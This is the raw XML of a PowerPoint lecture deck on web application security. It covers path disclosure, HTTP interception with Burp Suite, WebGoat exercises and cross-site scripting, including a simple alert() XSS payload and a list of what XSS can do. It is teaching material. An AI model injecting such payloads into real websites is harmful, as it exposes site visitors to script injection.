              <a:t> C:\Inetpub\wwwroot\index.html)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Attackers can use this information to try to steal other data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Try Practical 6 Exercises 8 and 9</a:t>
            </a:r>
            <a:endParaRPr lang="en-SG"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60</a:t>
            </a:fld>
            <a:endParaRPr lang="en-SG"/>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Intercepting HTTP data exercise</a:t>
            </a:r>
            <a:endParaRPr lang="en-SG" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Software can be used to intercept and manipulate HTTP requests and responses</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Paros Proxy</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>BurpSuite</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>OWASP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>WebScarab</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Try </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>BurpSuite</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> in Practical 6 Exercise 10</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61</a:t>
            </a:fld>
            <a:endParaRPr lang="en-SG"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="21642996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BurpSuite</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>WebGoat</a:t>
            </a:r>
            <a:endParaRPr lang="en-SG" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>WebGoat</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Practical 6 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Exercises 11 to 13</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62</a:t>
            </a:fld>
            <a:endParaRPr lang="en-SG"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1907704" y="4365104"/>
            <a:ext cx="6176631" cy="830997"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-SG" sz="2400" dirty="0" smtClean="0"/>
              <a:t>You will learn Web Application Security in more detail in the module Secure Coding</a:t>
            </a:r>
            <a:endParaRPr lang="en-SG"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Example</a:t>
            </a:r>
            <a:endParaRPr lang="en-SG" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>The hacker may enter a script</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>&lt;script&gt;alert("hello");&lt;/script&gt;”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Some of the newer web browsers may try to guard against executing such </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>scrip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>ts</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-GB" dirty="0" smtClean="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7</a:t>
            </a:fld>
            <a:endParaRPr lang="en-SG"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="755576" y="3068960"/>
            <a:ext cx="3456384" cy="918785"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5476808" y="2230231"/>
            <a:ext cx="2609984" cy="2197213"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Right Arrow 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4572000" y="3112814"/>
            <a:ext cx="648072"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Box 8"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5455590" y="4417799"/>
            <a:ext cx="3096344"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dirty="0" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>The script is executed on the web browser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SG" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Relies on the ability to inject content into the web page</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Besides creating a pop-up window, XSS can be used to :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Deface a web site</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Redirect the user to another page</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Manipulate the Document Object Model</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Any functions: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>windows.alert</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>, read file, write files, etc</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>“Poison” cookies</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>And more ...</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8</a:t>
            </a:fld>
            <a:endParaRPr lang="en-SG"/>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Stored XSS</a:t>
            </a:r>
            <a:endParaRPr lang="en-SG" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-SG" dirty="0" smtClean="0"/>
              <a:t>Stored XSS happens when the attacker enters specially crafted input and it is stored on the web application</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-SG" dirty="0" smtClean="0"/>
              <a:t>The attacker’s crafted input is loaded when other users visit the website</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-SG" dirty="0" err="1" smtClean="0"/>
              <a:t>Eg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-SG" dirty="0" smtClean="0"/>
              <a:t> the attacker enter malicious input into a Review or Comments </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-SG" dirty="0" err="1" smtClean="0"/>
              <a:t>textarea</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-SG" dirty="0" smtClean="0"/>
              <a:t>. Other web visitors who visit the Reviews/Comments page will load the malicious code.</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9</a:t>
            </a:fld>
            <a:endParaRPr lang="en-SG"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="20790011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fab">
  <a:themeElements>
    <a:clrScheme name="Prefab">
      <a:dk1>
        <a:sysClr val="windowText" lastClr="000000"/>
      </a:dk1>
      <a:lt1>
        <a:sysClr val="window" lastClr="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Prefab">
      <a:majorFont>
        <a:latin typeface="Arial Black"/>
        <a:ea typeface=""/>
        <a:cs typeface=""/>
        <a:font script="Jpan" typeface="ＭＳ Ｐゴシック"/>
        <a:font script="Hang" typeface="HY견고딕"/>
        <a:font script="Hans" typeface="宋体"/>
        <a:font script="Hant" typeface="新細明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efab">
      <a:fillStyleLst>
        <a:solidFill>
          <a:schemeClr val="phClr"/>
        </a:solidFill>
        <a:gradFill rotWithShape="1">
          <a:gsLst>
            <a:gs pos="0">
              <a:schemeClr val="phClr">
                <a:tint val="30000"/>
                <a:satMod val="200000"/>
              </a:schemeClr>
            </a:gs>
            <a:gs pos="30000">
              <a:schemeClr val="phClr">
                <a:tint val="60000"/>
                <a:satMod val="250000"/>
              </a:schemeClr>
            </a:gs>
            <a:gs pos="50000">
              <a:schemeClr val="phClr">
                <a:tint val="57000"/>
                <a:satMod val="250000"/>
              </a:schemeClr>
            </a:gs>
            <a:gs pos="100000">
              <a:schemeClr val="phClr">
                <a:tint val="17000"/>
                <a:satMod val="350000"/>
              </a:schemeClr>
            </a:gs>
          </a:gsLst>
          <a:lin ang="4000000" scaled="1"/>
        </a:gra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90000" algn="ctr" rotWithShape="0">
              <a:srgbClr val="000000">
                <a:alpha val="60000"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>
        </a:effectStyle>
        <a:effectStyle>
          <a:effectLst>
            <a:outerShdw blurRad="110000" algn="ctr" rotWithShape="0">
              <a:srgbClr val="000000">
                <a:alpha val="65000"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>
        </a:effectStyle>
        <a:effectStyle>
          <a:effectLst>
            <a:outerShdw blurRad="120000" algn="ctr" rotWithShape="0">
              <a:srgbClr val="000000">
                <a:alpha val="70000"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>
          <a:scene3d>
            <a:camera prst="orthographicFront"/>
            <a:lightRig rig="glow" dir="t">
              <a:rot lat="0" lon="0" rev="1800000"/>
            </a:lightRig>
          </a:scene3d>
          <a:sp3d contourW="12700" prstMaterial="dkEdge">
            <a:bevelT w="50800" h="44450" prst="angle"/>
            <a:contourClr>
              <a:schemeClr val="phClr">
                <a:shade val="40000"/>
              </a:schemeClr>
            </a:contourClr>
          </a:sp3d>
        </a:effectStyle>
      </a:effectStyleLst>
      <a:bgFillStyleLst>
        <a:solidFill>
          <a:schemeClr val="phClr"/>
        </a:soli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blipFill>
          <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId1">
            <a:duotone>
              <a:schemeClr val="phClr">
                <a:shade val="75000"/>
                <a:satMod val="120000"/>
              </a:schemeClr>
              <a:schemeClr val="phClr">
                <a:tint val="94000"/>
                <a:satMod val="2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Prefab</Template>
  <TotalTime>5751</TotalTime>
  <Words>2649</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>On-screen Show (4:3)</PresentationFormat>
  <Paragraphs>451</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Arial Black</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Courier New</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>Wingdings 2</vt:lpstr>
      <vt:lpstr>Prefab</vt:lpstr>
      <vt:lpstr>Topic 6 Web Application Security </vt:lpstr>
      <vt:lpstr>Web Sites Vulnerabilities</vt:lpstr>
      <vt:lpstr>Sample Vulnerable Web Apps</vt:lpstr>
      <vt:lpstr>Character Encoding</vt:lpstr>
      <vt:lpstr>Character Encoding</vt:lpstr>
      <vt:lpstr>Cross-Site Scripting (XSS)</vt:lpstr>
      <vt:lpstr>XSS Example</vt:lpstr>
      <vt:lpstr>XSS</vt:lpstr>
      <vt:lpstr>Stored XSS</vt:lpstr>
      <vt:lpstr>XSS attack on MySpace</vt:lpstr>
      <vt:lpstr>Some ways to fix the XSS vulnerability</vt:lpstr>
      <vt:lpstr>Some ways to mitigate  the XSS vulnerability</vt:lpstr>
      <vt:lpstr>XSS Exercises</vt:lpstr>
      <vt:lpstr>Cross-Site Request Forgery (CSRF)</vt:lpstr>
      <vt:lpstr>CSRF Exercises</vt:lpstr>
      <vt:lpstr>CSRF Attacks</vt:lpstr>
      <vt:lpstr>Some ways to mitigate  the CSRF vulnerability</vt:lpstr>
      <vt:lpstr>Forced Browsing</vt:lpstr>
      <vt:lpstr>Forced Browsing Example</vt:lpstr>
      <vt:lpstr>Forced Browsing Example</vt:lpstr>
      <vt:lpstr>Using Scanning Tools</vt:lpstr>
      <vt:lpstr>Forced Browsing Example</vt:lpstr>
      <vt:lpstr>Mitigating the vulnerability</vt:lpstr>
      <vt:lpstr>Command Execution</vt:lpstr>
      <vt:lpstr>SQL Injection</vt:lpstr>
      <vt:lpstr>SQL Injection</vt:lpstr>
      <vt:lpstr>SQL Injection</vt:lpstr>
      <vt:lpstr>SQL Injection Techniques</vt:lpstr>
      <vt:lpstr>SQL Error Message</vt:lpstr>
      <vt:lpstr>Finding out Table Column</vt:lpstr>
      <vt:lpstr>Meta Information</vt:lpstr>
      <vt:lpstr>More SQL Injection</vt:lpstr>
      <vt:lpstr>More SQL Injection</vt:lpstr>
      <vt:lpstr>Finding out column names</vt:lpstr>
      <vt:lpstr>Stored Procedures</vt:lpstr>
      <vt:lpstr>MS SQL Stored Procedures</vt:lpstr>
      <vt:lpstr>Blind SQL Injection</vt:lpstr>
      <vt:lpstr>Blind SQL Injection</vt:lpstr>
      <vt:lpstr>Other SQL operations</vt:lpstr>
      <vt:lpstr>SQL Injection Exercise</vt:lpstr>
      <vt:lpstr>Some ways to mitigate SQL injection vulnerability</vt:lpstr>
      <vt:lpstr>Database Login</vt:lpstr>
      <vt:lpstr>Fixing the vulnerability</vt:lpstr>
      <vt:lpstr>Data tampering</vt:lpstr>
      <vt:lpstr>Form Data</vt:lpstr>
      <vt:lpstr>Form Data – Hidden Fields</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Cookie values</vt:lpstr>
      <vt:lpstr>Session Hijacking</vt:lpstr>
      <vt:lpstr>Fixing web vulnerability</vt:lpstr>
      <vt:lpstr>Error Messages</vt:lpstr>
      <vt:lpstr>Error Messages</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Fixing this vulnerability</vt:lpstr>
      <vt:lpstr>Guidelines for Error Messages</vt:lpstr>
      <vt:lpstr>Guidelines for Error Messages</vt:lpstr>
      <vt:lpstr>Full Path Disclosure</vt:lpstr>
      <vt:lpstr>Intercepting HTTP data exercise</vt:lpstr>
      <vt:lpstr>BurpSuite and WebGoat</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XYZ</dc:title>
  <dc:creator>staff</dc:creator>
  <cp:lastModifiedBy>Eileen Yeo</cp:lastModifiedBy>
  <cp:revision>91</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2012-02-22T05:39:57Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-07-04T04:22:01Z</dcterms:modified>
</cp:coreProperties>
</file>